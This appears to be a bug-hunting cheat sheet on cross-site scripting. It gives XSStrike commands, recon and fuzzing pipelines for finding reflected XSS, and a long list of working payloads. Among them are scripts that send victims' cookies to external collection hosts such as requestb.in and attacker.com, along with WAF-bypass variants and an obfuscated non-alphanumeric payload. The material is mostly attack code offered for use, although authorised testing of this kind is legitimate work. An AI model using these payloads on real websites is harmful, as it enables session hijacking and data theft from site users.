xss

• Tools

XSSCrapy

XSStrike

• Cross Site Scripting detection suite equipped with parsers.

• XSStrike analyzes the response with multiple parsers and then crafts payloads that are guaranteed to work by context analysis integrated with a fuzzing engine.

Documentation

XSStrike Documentation

Usage Commands

Classical GET: python xsstrike.py -u "http://example.com/search.php?q=query"

POST: python xsstrike.py -u "http://example.com/search.php" --data "q=query"

Path payloads: python xsstrike.py -u "http://example.com/search/form/query" --path

Crawl and test: python xsstrike.py -u "http://example.com/page.php" --crawl

Load payloads from file and test them: python3 xsstrike.py -u "http://example.com/page.php?q=query" -f /path/to/file.txt

Find hidden parameters: python xsstrike.py -u "http://example.com/page.php" --params

• automate Rxss

method uniq

https://github.com/yavolo/eventlistener-xss-recon

Method 1: Unique

• Collect a subdomain (AssetFinder, SubFinder, Amass, Find-domain, Google Dorking)

• Find the number of sub-domains which are active: cat subdomains.txt | httprobe | tee -a host.txt

• Use your payloads: <script/src=//NJ.₨></script>

• Your report if not accepted.

• Find endpoints: cat host.txt | crawler | tee -a endpoint.txt cat host.txt | waybackurl | tee -a endpoint.txt

• Fuzz parameters to find XSS vulnerability using qsreplace: cat endpoint.txt | qsreplace ‘“><img src=x onerror=alert(1)> | tee -a xss_fuzz.txt

• Check if the number of parameters reflect the payload using FREQ tool: cat xss_fuzz.txt | freq | tee -a possible_xss.txt

Method 2: CleanP and InjectP

• cleanP

• injectP

• XSS.yaml: gist link

• Single target: gau target.com | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt

• Multiple endpoints: cat AllEndPoint.txt | cleanP | injectP 'T%22rSpGeUMo%3E7N' | httpx -ms 'T"rSpGeUMo>7N' | nuclei -t XSS.yaml -o xss.txt

Method 4

• Read this article.

Tips

• If XSS is not executed through the UI, you can try to insert it through the API

• It can then fire on the UI. Many filters are not present like this

Payloads

# Document.location
<script>document.location('http://IP_EXTERNE/'+document.cookie)</script>
<script>document.location.href = 'http://requestb.in/XXXXXX?cookies =' + document.cookie;</script>

# Window
<script>window.open("http://monserveur/Cookie="+document.cookie)</script>
<script>window.location='http://monsite.free.fr/script.php?cookies='+(document.cookie);</script>

# Document.write
<script>document.write('<img src="https://requestb.in/xxxxx?cookie="+document.cookie>admin</img>');</script>
admin"></i>)</span><script>document.write("<img src=http://requestb.in/XXXXX?cookie=".concat(encodeURI(document.cookie)).concat("/>"))</script><i>

<script>var xhr = new XMLHttpRequest();xhr.open('POST', 'http://requestb.in/w0sw22w0', true);xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');xhr.send(document.cookie);</script>

# alert(1) in JS
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

injecting inside of input tags
<input/onfocus=alert(0) autofocus>
<input/onfocus=alert`0` autofocus>
<input/onfocus=prompt`0` autofocus>
1'"><input/onfocus={alert`1`} autofocus> 

# WAF Bypass
'';!--"<XSS>=&{()}
<IMG SRC="javascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<svg/onload=(((confirm(1))))>
confirm()
confirm``
(confirm``)
{confirm``}
[confirm``]
(((confirm)))``
co\u006efirm()
new class extends confirm``{}
[8].find(confirm)
[8].map(confirm)
[8].some(confirm)
[8].every(confirm)
[8].filter(confirm)
[8].findIndex(confirm)

# No HTML events
<script>alert(1)//
<script>alert(1)<!--
<script>alert(1)%0A-->
<script src=data:,alert(1)>
<script src=//HOST/FILE>
<script src=https:DOMAIN/FILE>
<svg><script xlink:href=//HOST/FILE>
<svg><script xlink:href=https:DOMAIN/FILE>
<svg><script xlink:href=data:,alert(1)>
<svg/onload=(confirm(1))>
<svg/onload=confirm(1)>

# Stealing the source code without triggering browser restrictions
<svg/onload="(new Image()).src='//attacker.com/'%2Bdocument.documentElement.innerHTML">

# Non alphanumeric alert() payload
Ð=[],Ř=+!+Ð,ˍ=Ř+Ř+Ř,Š=!!Ð+Ð,Ť=!Ð+Ð,Ǎ=(!Ð+{})[Ř+[+Ð]],Č=(Ð+{})[Ř],Ȟ=Š[Ř],Ě=Š[+Ð],_=Ť[ˍ]+Č+Ȟ+Ě,ǰ=Ð[_]+Ð,š=Ð[Ð]+Ð,Ð[_][Ǎ+Č+(š)[Ř]+Ť[ˍ]+Ě+Ȟ+(š)[+Ð]+Ǎ+Ě+Č+Ȟ](Ť[Ř]+Ť[Ř+Ř]+Š[ˍ]+Ȟ+Ě+ǰ[Ř+[ˍ]]+ǰ[Ř+[ˍ+Ř]])()